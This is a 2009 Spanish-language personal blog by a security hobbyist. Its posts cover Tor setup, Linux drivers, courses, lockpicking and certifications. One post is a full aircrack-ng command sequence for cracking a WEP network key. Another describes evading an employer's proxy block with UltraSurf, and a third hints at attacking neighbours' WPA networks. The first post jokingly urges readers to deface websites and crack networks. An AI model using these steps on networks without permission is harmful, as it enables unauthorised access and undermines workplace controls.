jueves, 31 de diciembre de 2009

FELIZ AÑO!!! (mi balance del 2009)

Antes que nada les digo Feliz Año!!! Que empiecen de la mejor manera, y que todos sus proyectos se puedan concretar.


Voy a hacer un pequeño balance de lo que fue para mí este 2009 que esta terminando. En lo económico, pude comprarme la notebook que tanto quería, y lo malo es que me robaron mi N95 que había mandado a traer del exterior. Lo mejor del año se presento en Septiembre, ya que pude asistir por primera vez a la Ekoparty,la mejor conferencia en Seguridad Informática de Sudamérica. Respecto a lo laboral, no puedo decir que fue algo positivo el cambio, mas bien, muchas veces me arrepiento de haberlo hecho, ya que perdí la oportunidad de crecer profesionalmente. En todo el 2009 sólo pude realizar un solo curso, que si bien no fue la gran cosa, sirvió para que no pierda interés en el área que me gusta. Ahora me queda solo apuntar a tener un 2010 espectacular, ya estoy inscripto para empezar en la Universidad CAECE la carrera Tecnicatura en Seguridad Informática, estoy inscripto para un curso en CETIA de lo mismo, seguridad informática, hace 3 semanas empecé a estudiar en Linux College, y voy a ver si en marzo, ya con los horarios definidos de la facultad, continuo con CCNA, que es algo que lo dejé pendiente, pero quiero terminarlo.

En fin, el 2009 se va, y empieza un 2010 con todas las expectativas hacia arriba.

martes, 29 de diciembre de 2009

Anonimato en la web con Tor

En otro post mencionaba como obtener el anonimato en la web con UltraSurf 9.7 desde Windows, ahora si somos usuarios Linux (aunque en el trabajo estemos obligados a usar Windows) y queremos tener el mismo fin, si bien se podría intentar emular con Wine UltraSurf, sería mejor si buscamos algún programa para dicho sistema.

Revisando la web me tope con el Proyecto Tor, a continuación una breve explicación extraída de su website:

"Tor es un proyecto software que le ayuda a defenderse contra el análisis de tráfico, una forma de vigilancia de la red que amenaza la libertad personal y la privacidad, la confidencialidad en los negocios y relaciones, y la seguridad del estado. Tor le protege transmitiendo sus comunicaciones a través de una red distribuída de repetidores llevados por voluntarios de todo el mundo: evita que alguien que observa su conexión a Internet aprenda qué sitios visita, y evita que los sitios que visita aprendan su posición física. Tor funciona con muchas de sus aplicaciones existentes, incluyendo navegadores web, clientes de mensajería instantánea, acceso remoto, y otras aplicaciones basadas en el protocolo TCP."

Ahora vamos a lo interesante, vamos a instalar Tor en nuestra PC y hacerlo funcionar en Firefox con Privoxy. Antes que nada vamos a descargar las fuentes de Tor del siguiente enlace: http://www.torproject.org/dist/tor-0.2.1.20.tar.gz

Una vez que hayamos descargado las fuentes, abrimos una terminal y vamos a instalar unas dependencias que solicita Tor para que lo podamos compilar sin inconveniente:

sudo apt-get install libevent-dev libssl-dev


Una vez que haya finalizado, descomprimimos Tor con el siguiente comando:

tar -xvf nombre_del_paquete

Ingresamos a la carpeta de Tor, y ahí tecleamos lo siguiente para instalarlo:

./configure && make

sudo make install

Ahora vamos a instalar Privoxy desde los repositorios con el siguiente comando:

sudo apt-get install privoxy


Vamos a configurar el config de Privoxy que se encuentra en la carpeta /etc/privoxy/ de la siguiente manera:

sudo nano config


Ahí vamos añadir al principio la siguiente línea, no se olviden del espacio y del punto al final

forward-socks4a / 127.0.0.1:9050 .

También vamos a desactivar las siguientes opciones que se encuentran dentro del mismo archivo. Para desactivarlo solo hay que comentar la línea, y se logra agregando al principio de la línea el signo numeral #

logfile logfile
jarfile jarfile (puede no aparecer)
debug 1 # show each GET/POST/CONNECT request (Esto en algunos sistemas)
enable-remote-toggle
enable-remote-http-toggle
enable-edit-actions

Una vez modificado el archivo nos queda instalar el plugins de Firefox para utilizarlo, lo instalamos del siguiente link (https://addons.mozilla.org/firefox/2275/), un par de clicks y reiniciamos Firefox.

Vamos a ver que en la parte inferior del lado derecho se encuentra de color rojo la siguiente frase "Tor deshabilitado", esto es por defecto cada vez que iniciamos Firefox:


Para habilitarlo solo hacemos un clic en la leyenda, y automáticamente cambia a color verde y dice "Tor habilitado":


Para verificar que Tor esta funcionando correctamente vamos a la siguiente página https://check.torproject.org/ y nos lanza el estado, en mi caso sale la siguiente imagen, demostrando que esta funcionando correctamente.


Ahora para que verifiquen que no les miento, les pongo la siguiente imagen, la del navegador Opera es sin Tor y verifiquen que la IP es 190.51.78.17 y dice que mi ISP es Telefónica de Argentina con sistema operativo Linux. Y en el navegador Firefox con Tor funcionando sale que mi IP es la 204.8.156.142 y que mi ISP es Boston University, y no solo eso, sino que aparte dice que mi sistema operativo es Windows, y estoy utilizando Linux!!!



Fuente: http://www.torproject.org

jueves, 24 de diciembre de 2009

Feliz Navidad para todos!

Hace mucho que no posteaba algo, no es que no tenga ganas, sino que estuve enfermo, y con el fuerte dolor de cabeza que me producía la angina no daban ánimos de estar frente a la PC (con lo cual, ni a trabajar pude ir).

Estamos sobre las fiestas, mañana es navidad y les quiero desear lo mejor. Pásenla con su familia, amigos, coman sano y sin excederse, se que es dificil, ya que todos preparan manjares para las fiestas. Tambien tomen con moderación, no nos pasemos con los brindis, y si lo hacen, por favor no manejen, ya que no sólo perjudicarían su vida, sino la ajena también.


Feliz Navidad para todos!!!!

Saludos.

viernes, 11 de diciembre de 2009

Hackearon Speedy.com.ar


Si intentan ingresar en estos momentos a speedy (www.speedy.com.ar) van a ver que fue hackeada la página.

Esta es lo que aparece al ingresar


Por lo que parece no fueron KKR, que ownearon varias páginas. O habrán cambiado de nick? No lo creo, habría que analizar que tecnicas usaron, y bueno, el motivo más que obvio del porque lo hicieron.

miércoles, 9 de diciembre de 2009

Chrome para Linux (beta)

En el día de ayer, martes 8 de diciembre, día de la Inmaculada Concepción de María, me llegó un mail de Google avisándome que ya esta disponible la versión beta para Linux de Google Chrome, en el mail dice que es un navegador rápido y estable, luego nos da un poco de información de lo que les llevó desarrollarlo:
  • 60.000 líneas de código escritas para Linux
  • 23 compilaciones de desarrolladores
  • 2.713 bugs corregidos para Linux
  • 12 colaboradores y editores de bugs externos para la base de código de Google Chrome para Linux y 48 colaboradores externos de código
Y el link para poder descargar que es el siguiente:
http://www.google.com/chrome/intl/es/w00t.html

A simple vista te da para descargar el paquete en el formato deb y rpm (por si no lo saben, el .deb es para distros basadas en Debian, y rpm es para distros como Red Hat, Fedora, Mandriva y SuSe) y que hay para sistemas de 32bit como para 64bit.

Una vez que elijamos el tipo de paquete que queremos para la versión que tenemos (32 o 64) aceptamos, una vez descargado el archivo a la PC seguramente se les abrira el "Instalador de paquetes" y proceden a instalarlo, pero si quieren hacerlo desde la consola nos ubicamos en el directorio donde se encuentra el paquete y tecleamos lo siguiente:
sudo dpkg -i nombre_del_paquete_punto_deb


Ahí vemos como finaliza la instalación.


Y ahora vamos a "Aplicaciones", en "Internet" buscamos "Chrome". Lo ejecutamos y nos aparecerá la siguiente ventana que nos va a aparecer por primera vez


Y para que vean que no los estoy engañando, ingreso a mi Blog y abajo de todo van a ver su IP, el Sistema Operativo que utilizan, y el Explorador, que en este caso es Chrome.


Por mi parte solo digo que no tuve tiempo para probar este explorador en Windows, ni en Linux como para decir si es rápido o que mejoras tiene en comparación de otros navegadores. Pero podemos rescatar que Google se dio cuenta que no puede descuidar a los usuarios de Linux, ya que hace rato lo veníamos pidiendo.

Fuente:
http://www.google.com/chrome

lunes, 7 de diciembre de 2009

Anonimato en la web con UltraSurf 9.7

Desde que empecé a trabajar en donde estoy actualmente, me tope con que tenia los puertos bloqueados para conectarme al MSN, si bien lo correcto era solicitar permiso al Administrador de la red, fui un poco por el lado no ético, lo que me llevó a instalar, en la PC con Windows Vista, UltraSurf 9.7 (en su momento utilice la versión 9.5, ahora van por la 9.7).

Este es un software que te permite navegar anónimamente de forma fácil y segura. Sin dudas con él se puede acceder a páginas prohibidas (black list) por el proxy de su empresa. La mayoría de ellas tienen que ver con páginas de descarga (ej. rapidshare, megaupload, etc), redes sociales (ej. twitter, facebook, linkedin, etc), chat (ej. oulchat, elchat, etc), y otras páginas a las cuales no quieren que accedan sus jefes y/o administradores (porque digo administradores? muchachos, somos pocos y nos conocemos mucho ;) )

Lo primero que hay que hacer es descargar el programa (que es un .zip y su antivirus al descomprimirlo puede detectarlo como dañino) de su website UltraSurf 9.7

Una vez descargado lo descomprimimos, y al ejecutarlo nos mostrara una pantalla igual a la de abajo, ahora hacemos clic en "Option"


Se nos abrirá la siguiente pantalla, y vamos a "Proxy Settings"


Acá vamos a modificar la configuración del proxy, seleccionamos manual e ingresamos la dirección IP de nuestro proxy en "Proxy Host", en mi caso sería 10.10.1.1, y el puerto por donde salimos en "Proxy Port", la mayoría de las veces se utiliza 80 u 8080, aunque pueden cambiar. Le dan clic en "OK".


Hacen clic en "Retry", y un clic en "Home". Si ves que aparece la siguiente pantalla, ya estas navegando de forma anónima.


Si quieres sacarte las dudas, ante de ejecutar el programa verifica tu dirección IP en alguna pagina, como www.cual-es-mi-ip.net o www.comosabermiip.com.ar, anota la dirección que te muestran, después ejecuta el programa, una vez que hayas realizado los pasos de configuración, ingresa nuevamente a las páginas para saber tu IP, y si el número cambio, el programa esta funcionando de correcta manera.

Google crece y crece

No soy mucho de hacer críticas, ni opiniones, pero la semana pasada vi unas noticias acerca de los DNS de Google, no le preste mucha atención (no es que sea una persona súper ocupada) porque no creí que sea de tanta importancia. El fin de semana trate de leer los blogs y páginas a las cuales suelo recurrir en busca de información importante, noticias, etc, y vi en muchos que hacían mención a los DNS de Google, así que me puse a leer un poco mas la noticia.

Si bien Google es un potente buscador, encuentra casi todo lo que uno busca en la Web, cada vez ofreciendo mas servicios al usuario, siempre de manera gratuita (claro, pero te pone publicidad, y depende de que servicio a veces te cobra). Sin dudas esta empresa creció un montón, tanto que ya la gente no dice mas "buscar" o "encontrar", ahora se dice "googlear", cosas que dudo mucho que Microsoft con Bing le gane el terreno, o trate de arrebatarle una gran parte.

Algunos de los servicios de Google son:
Estos son algunos de los servicios de Google, y el nuevo servicio es Google Public DNS. Ahora bien, supongo que muchos sabrán lo que hace un servidor DNS, sino es así les voy a dar una breve explicación. Cada Host tiene una dirección IP única en Internet, esta dirección consta de 4 octetos, para el ser humano es más fácil acordarse un nombre que unos números, así que el servidor DNS hace esta tarea, convierte nombres fáciles de recordar (Ej. www.google.com) a direcciones IP (Ej. 200.12.4.2).


Cada uno es libre de utilizar los DNS que uno desee, generalmente utilizamos el que nos da nuestro ISP (en mi caso, los de Telefónica). Google ofrece sus servidores DNS diciendo que son muy rápidos, y seguros (dice que no es vulnerable a spoofing DNS y a DoS). ¿Pero que ganan ofreciendo este servicio? Sin dudas, y lo que es más valioso para ellos, información nuestra, van a saber por donde navegamos, que webs visitamos.

Si quieren probar estos servidores DNS de Google y verificar algún incremento de velocidad, cambien sus DNS por estos:

8.8.8.8
8.8.4.4

Fuente:
http://code.google.com/intl/es/speed/public-dns/docs/intro.html
http://www.genbeta.com/actualidad/google-public-dns-otro-paso-mas-en-la-conquista-de-la-red

domingo, 29 de noviembre de 2009

Rompiendo clave WEP con aircrack en Ubuntu 9.10

Para poder hacer romper la clave WEP solo es necesario tener dos cosas, el programa instalado "Aircrack-ng", y una placa de red wireless compatible.

Pueden aprovechar las placas USB Eusso que vienen con chipset Zydas, y en linux utilizan el driver zd1211rw, que permite monitorear e inyectar. La placa la pueden conseguir por MercadoLibre a menos de 100 pesos (en algunos casos supera este precio), la cual para nuestros propositos anda muy bien.

Esta es mi placa (disculpen por la calidad de la foto, fue recien sacada con el celular)


A este momento pienso que ya tienen instalado el programa Aircrack-ng, pero si por las dudas no lo tienen, tienen dos formas de instalarlo, aca voy a decir la más facil, para que no nos vayamos de tema.
Abren una consola y escriben:
sudo apt-get install aircrack-ng

Ahora a seguir los siguientes pasos

Paso 1: Ponemos la placa wi-fi en modo monitor, ponemos lo siguiente en la consola:
sudo airmon-ng start wlan2
ACLARACION: wlan2 es en mi caso, ustedes para saber cual es hagan antes un iwconfig


Paso 2: Vamos a ver las redes que tenemos disponibles:
sudo airodump-ng mon0
ACLARACION: mon0 es en mi caso, este nombre puede variar


Paso 3: Luego de fijar el AP a crackear, vamos a guardar los datos de la siguiente manera:
sudo airodump-ng -c 9 --bssid DIRECCION_MAC_AP -w ARCHIVO_A_GUARDAR mon0
ACLARACION: la opcion "-c 9" es el canal que esta el AP, puede varias, esto lo verifican en el paso anterior.


Paso 4: Realizamos una desahutenticación
sudo aireplay-ng -1 0 -e ESSID_AP -a DIRECCION_MAC_AP -h DIRECCION_MAC_NUESTRA mon0


Paso 5: Inyectamos paquetes para conseguir mas rapido la cantidad de IVS
sudo aireplay-ng -3 -b DIRECCION_MAC_AP -h DIRECCION_MAC_NUESTRA mon0


Paso 6: Rompemos la clave WEP de la siguiente forma:
sudo aircrack-ng -z -b DIRECCION_MAC_AP ARCHIVO_A_GUARDAR*.cap


No es para que vayan a romper cualquier WEP que se les cruce por el camino. Pero no duden en probar este software que viene tanto para linux (este es mi caso) como para Windows.

Fuente: http://www.aircrack-ng.org/

lunes, 23 de noviembre de 2009

Antena Omnidireccional Casera

El viernes nos juntamos en mi casa con Rubén, y empanadas de por medio, nos decidimos encender las notebooks. Al intentar conectarse a la red de mi casa nos dimos cuenta de que habían dos redes más, y una tercera que a veces aparecía y a veces no. De las 3, solo una no tenia ningún tipo de seguridad, al conectarme (tarde bastante, ya que la señal se perdía a cada instante) y entrar a la configuraciones del router, me di cuenta de quien era, y como soy una buena persona que no le gusta hacer daño a nadie, me desconecte. Las otras dos redes poseían el tipo de cifrado WPA, pero con muy poca señal.

Entonces si tan solo tuviéramos una antena mas grande podríamos intentar algo, y nos pusimos a ver los precios en MercadoLibre, y hay empezando de los u$s20 de 7bdi, y una antena de marca (TP-LINK) de 12 dbi a unos u$s50. Como nosotros somos medios coditos en ese tema, nos pusimos a ver páginas para hacernos unas antenas nosotros mismo.

Entre todos los que vimos nos resulto interesante éste, que lo vi en Taringa, pero el mismo se repite en varios foros y paginas dentro de la red de redes (o sea internet), así que solo hago un COPY&PAGE, y agradezco al creador del tutorial.


Materiales de Construcción:

2 - Metros de cañería de Cobre de 1/4 pulgada (Ferreterías, C. Automotrices, C. Refrigeración, etc.)
2 - Metro Cable RG-6u (Ferreterías, C. Electrónicos, Pueden usar lo que tienen en casa de TV por Cable)
1 - Conector N ( C. Electrónicos, C. Comunicación, etc.)
2 - Metros de tubo PVC (Según se indica en el Video, Ferreterías)
3 - Metros Soldadura de estaño (C. Electrónicos, Ferreterías, etc.)
1 - Gaseosa bien helada, bocadito, jaja ...
Y algunas cosas menores...
100% - de mucho empeño

Descargar video:

http://rapidshare.com/files/178526967/Antena_Omnidireccional_14Dbi_Part1.rar
http://rapidshare.com/files/178530790/Antena_Omnidireccional_14Dbi_Part2.rar
http://rapidshare.com/files/178534765/Antena_Omnidireccional_14Dbi_Part3.rar
http://rapidshare.com/files/178537951/Antena_Omnidireccional_14Dbi_Part4.rar
http://rapidshare.com/files/178540663/Antena_Omnidireccional_14Dbi_Part5.rar


Ahora solo me queda realizar la compra de los materiales, y apenas tenga terminada la antena, seguro que subo la imagen de cómo me quedó.

Fuente: http://www.taringa.net

martes, 17 de noviembre de 2009

Una herramienta que no debe faltar


No se si lo conte o no, pero hace rato que soy usuario de linux, en mi humilde PC tengo dos sistemas, Ubuntu 8.10 y Windows XP SP3 (esta última porque vienen amigos, novia incluida, a usar la pc, y les es mas facil ese Sistema). Luego en mi laptop tengo -para mi es- la vedete de linux, Ubuntu 9.10 Karmic Koala.

Aparte de que me encanta como quedó Ubuntu (esteticamente), nunca dejo de usar la distro de BackTrack, que esta mas bien orientada para auditoría de seguridad, y pentest. No la uso profesionalmente, sino para aprender, a veces booteo del mismo live cd, o a veces dentro de una VMWare.

Este sistema actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a la seguridad informática. Se deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX. WHAX es la evolución del Whoppix (WhiteHat Knoppix), el cual pasó a basarse en la distribución Linux SLAX en lugar de Knoppix. La última versión de esta distribución, aún en estado Beta (ahora Pre-Final), cambió el sistema base, antes basado en Slax y ahora en Ubuntu. También se actualizó el kernel (2.6.29.3). Incluye una larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless. Fue incluida en el puesto 32 de la famosa lista "Top 100 Network Security Tools" de 2006.

Si quieren bajarlo, les dejo el link de descarga para la versión BackTrack 4 Pre Release, pesa apenas 1390 MB. Click aquí para descargarlo.

Fuentes:
http://www.remote-exploit.org
http://es.wikipedia.org/wiki/BackTrack

jueves, 12 de noviembre de 2009

Instalando Drivers Nvidia 190.42 en Ubuntu 9.10 (64 bit)

Instale en mi Laptop (mi humilde Dell XPS 13) hace poco los drivers de NVIDIA, por defecto el sistema me reconoce los driver 173 y 185 como hardware privativos, y me da la opción de instalarlos, ya que se encuentran en los Repositorios.

Cómo en la página de NVIDIA vi que van por la 190.42, me dije, vamos a ponerle el último, ya que mejoras seguro que hay en comparación a las anteriores.

Hay dos formas para instalar los drivers, una es a través de los repositorios, y otra es descargando el archivo de la página www.nvidia.es e instalarlo manualmente. Esta vez lo instale desde los repositorios, y les paso a contar los pasos que hay que hacer, o los que yo hice y me funcionaron.

Antes que nada abrimos una terminal, y luego vamos a modificar el source.list que se encuentra en /etc/apt/ de la siguiente forma (esto como superusuario) con el editor de sus preferencias, en mi caso nano:
nano /etc/apt/source.list


Después añadimos las siguientes líneas al final del archivo, pueden poner un comentario anteponiendo el signo #, para saber de que se tratan esos repositorios (en mi caso puse Nvidia):
#Nvidia
deb http://ppa.launchpad.net/nvidia-vdpau/ppa/ubuntu karmic main deb-src http://ppa.launchpad.net/nvidia-vdpau/ppa/ubuntu karmic main


Al finalizar guardan y cierran el archivo. Ahora faltaría agregar la siguiente llave de esta forma:
apt-key adv --keyserver keyserver.ubuntu.com --recv-keys CEC06767


Y luego de esto actualizan la lista de paquetes con el comando apt-get update:


Una vez que se hayan agregado los repositorios solo falta instalar los driver, pero esto es una tarea sencilla, en la consola ponen lo siguiente y presionan la tecla “Enter”:
apt-get install nvidia-190-modaliases nvidia-glx-190


A mi me paso que después de eso no se instalo completamente, pero si vas a “Controlador de Hardware” que se encuentra en “Sistemas”, “Administración”. Vas a poder observar que ahí figura la versión 190, solo es cuestión de seleccionarla, y darle click en Activar y listo. Reinicia y vas a tener instalado la última versión del driver de NVIDIA.

Si quieren leer más información (aspectos destacados, productos soportados) acerca de este driver:
http://www.nvidia.es/object/linux_display_amd64_190.42_es.html

sábado, 31 de octubre de 2009

Mi set de LockPicking

Luego de buscar por MercadoLibre, MasOportunidades, buscar en google, y cualquier otro medio, al fin el día de ayer (sabado 31 de octubre) lo pude tener en mis manos.
Les presento mi kit de Lockpicking:







Es un conjunto de 20 ganzúas y 3 tensores, los compre por Mercadolibre. El flaco que me las vendió tiene la mejor onda, no solo tubo la molestia de acercarce hasta un punto cercano en donde me encontraba, sino que tambien me explicó algunas técnicas. El vendedor es cerrajero de profesión y está en esto desde que el padre (también cerrajero) le enseñó, y me dijo que tiene en su local varios tipos de cerraduras y que no tenia molestias en enseñarme y en que vaya a practicar. Toda la mejor el flaco, que también me dijo que muchas personas le compraron el kit por hobby.
Mi interes por el Lockpicking surgió en la Ekoparty de este año (me gusta desde hace un tiempo, pero nunca me animé), ahí ví como muchos se animaban a jugar al Gringo Warrior de la gente de TOOOL, que consistía en liberarse de las esposas y abrir 3 tipos de cerraduras en el menor tiempo posible.
Luego a travez del Blog de Leo me enteré que Augusto Pereyra estaba fundando el primer club de LockPicking en Argentina, al cuál sin dudarlo solicite ser uno de los miembros.
Uno de los requisitos para ser miembros de este club es ser recomendado por alguno de los miembros. Saber quien es miembro de dicho grupo es un misterio, pero puedes sospechar de quien lleva un par de ganzúas siempre encima ;)
No creo convertirme en un cerrajero profesional, pero no dudo de que me voy a divertir intentando abrir algun que otro candado.

Más información acerca de este club en el Blog de Kungfoosion : http://kungfoosion.blogspot.com/2009/10/lockpicking-club.html

Si quieren comprar su kit de LockPicking mandenme un mail a gonza.de.moron86@gmail.com y les paso los datos del vendedor.

domingo, 25 de octubre de 2009

Info sobre cursos (varios) interesantes

Desde hace unos días vengo pensando que curso poder realizar, y antes de eso, siempre es bueno saber quien es el instructor que lo dicta, para así poder googlearlo (o mejor, buscarlo en LinkedIn ) y ver que opina la gente que curso con ellos. También es bueno saber detalladamente el plan de estudio, y si la misma te prepara para rendir algún tipo de certificación, como pueden ser las de CEH (Certified Ethical Hacking), CISSP (Certified Information System Security Professional), CompTIA Security+, o alguna que otra que por ahí ande dando vuelta.
A continuación les pongo algunos cursos de gente que conozco, y que son muy recomendables, y otros que si bien no los hice, ni conozco quien los dicta, por el temario suenan interesantes.


"Hacking Your Network"
Training perteneciente a Base 4 Security, lo dicta Leonardo Pigñer (www.kungfoosion.blogspot.com), es uno de los organizadores de la Ekoparty, y un gran profesional en el área. Lo conozco del Training que dictó en la Ekoparty 2008, y es uno de los que más recomiendo. En el mes de noviembre se van a dictar en: Córdoba Capital (16 al 20 de noviembre), en Ciudad de Buenos Aires (23 al 27 de noviembre), y en Rosario (30 de noviembre al 04 de diciembre). Y más adelante, posiblemente, los van a estar dando en: Mendoza, Tierra del Fuego y el sur de Chile. Los interesados en este curso pueden consultar a capacitacion@base4sec.com


"CEH | Certified Ethical Hacking" (No oficial)
Este curso se está dictando en Centraltech, quiero aclarar que este es un curso NO OFICIAL, pero no por eso deja de ser bueno, y de excelente nivel técnico. Hasta lo que sabia, lo estaba dictando Héctor Jara, que es un excelente profesional y de amplia trayectoria, tanto docente como profesional. Los interesados manden mail a masinfo@centraltech.com.ar


"Curso de Seguridad Informática"
Este curso se lleva a cabo en las instalaciones de CETIA, tiene una duración de 39 horas, y según el temario parece demasiado completo. Sino estoy equivocado, lo dicta Juan Manuel García, si bien no lo conozco personalmente, por su perfil de LinkedIn parece ser una persona con muchos conocimientos técnicos. Para mas información pueden consultar a cursos@cetia.com.ar


"Experto en Seguridad Informática"
Este curso consta de 2 cuatrimestres con una carga horaria de 204 hs. Pertenece a ITMaster. Más que el plan que figura en la web no se nada más. La información que recibí cuando consulte no fue demasiada. Puden visitar la web www.itmaster.com.ar


"CISSP & Ethical Hacking"
Estos cursos se dictan en IT College, y los instructores son Hernán Racciatti y Fabián Calvete, ambos directores de SICLabs. A Hernan lo pude conocer un poco en Centraltech cuando curse unas clases con él. Por su experiencia y su forma de enseñar, no dudo que estos training sean de alto nivel técnico. Pueden consultar a info@itcollege.com.ar


Enterprise Security & Risk
Este cursa consta de 2 módulos con un régimen de 4 hs cada clase. Algunos de los instructores que lo dictan son Diego Maira, Sebastian Mannino, y Leonardo Baldelli. Estos dos últimos como instructores Regionales de ESR I & II. Si bien estos cursos son mas teóricos que prácticos, es recomendable para alguien que quiere empezar en el área. Para más información consulte a academia@proydesa.org


Estos son algunos de los cursos sobre Seguridad Informática que se dictan en Buenos Aires, no quiero dejar de lado el de CEH - curso oficial - que se dicta en Etek-Reycom, o los cursos que dicta Bonsai-sec (de Andres Riancho) sobre Vulnerabilidades Web y su framework W3af (Web Application Attack and Audit Framework).
Si saben de alguno más, no esta mal que lo informen, y mejor si lo han cursado, ya que pueden contar como son las clases, el instructor o demás cosas.

lunes, 19 de octubre de 2009

Certificación CompTIA A+ Version2009


Hace exactamente 10 días que no posteba, no sabia como continuar, si sobre las cosas que pasé en este tiempo (fin de semana en Mardel, clasificación al Mundial de la Selección, de cuestiones políticas, etc.), o si de algo técnico en relación a Informática, pero que mejor que hablar sobre esta certificación, CompTIA A+.

Si bien no es muy mencionada, cabe destacar que es muy importante, esta certificación muestra competencias como técnico de computadoras. Para obtener dicha certificación se debe rendir dos exámenes, 220-701 CompTIA A+ Essentials, y 220-702 CompTIA A+ Practical Application.

Los exámenes son en Ingles, por lo cuál es un punto a favor los que dominen ese idioma. Consta de 100 preguntas multiplechoise de las cuales mas de una puede ser la respuesta correcta, el tiempo estimado es de 90 minutos, para aprobar dichos exámenes en el 220-701 (Essentials) hay que obtener mínimo 675, y en el 220-702 (Practical Application) 700. Este examen esta enfocado a los profesionales de tecnologías de información que tienen una experiencia mayor o equivalente a 500 horas. El costo para rendir esta certificación es de u$s 168 para los no miembros, y de u$s 132 para los miembros de CompTIA.

A continuación les dejo un link para que puedan descargar un poco de material para ponerse a practicar, si es que desean rendir esta certificación Comptia A+.

Este es un archivo RAR, libre de virus, el cual contiene 3 libros en pdf y 2 laboratorios, uno sobre equipos desktop, y el otro de equipos de laptop.


Fuentes:
Web Site Oficial de CompTIA
Wikipedia

viernes, 9 de octubre de 2009

Conociendome con el mundo Blog

Hola,

Luego de tener mi paso en el fotolog antes de que salga la tribu "flogger", y ya con el boom de las redes sociales: "Facebook", "LinkedIn", y "Twitter"; creo que es momento de tener mi propio Blog. Soy seguidores de muchos blogs, la mayoría de temas sobre Informática (pasando desde sistemas operativos, redes, seguridad informática, programación) hasta de blog deportivos y graciosos.
Hoy un día muy agitado, ya que en el trabajo se realizó el acto del 17 de Octubre, "Día de la Lealtad", será casualidad que sea justo el día que se vota la Ley de Medios y se haga el acto con, peronistas?. Y dentro de unas horas parto rumbo a Mar del Plata, ya que hace 2 años que no salgo de vacaciones, y creo que es un momento de darme un pequeño descanso.
No me quiero ir de tema ni alargar mas mi primer post, asi que a los que lean mi blog les deseo un feliz fin de semana largo.
Salgan a bailar, juntensen con amigos, emborrachensen, defaceen website que se les cruze, rompan lo que quieran romper (WEB, WPA, etc)

Saludos para todos.
Gonzalo Ariel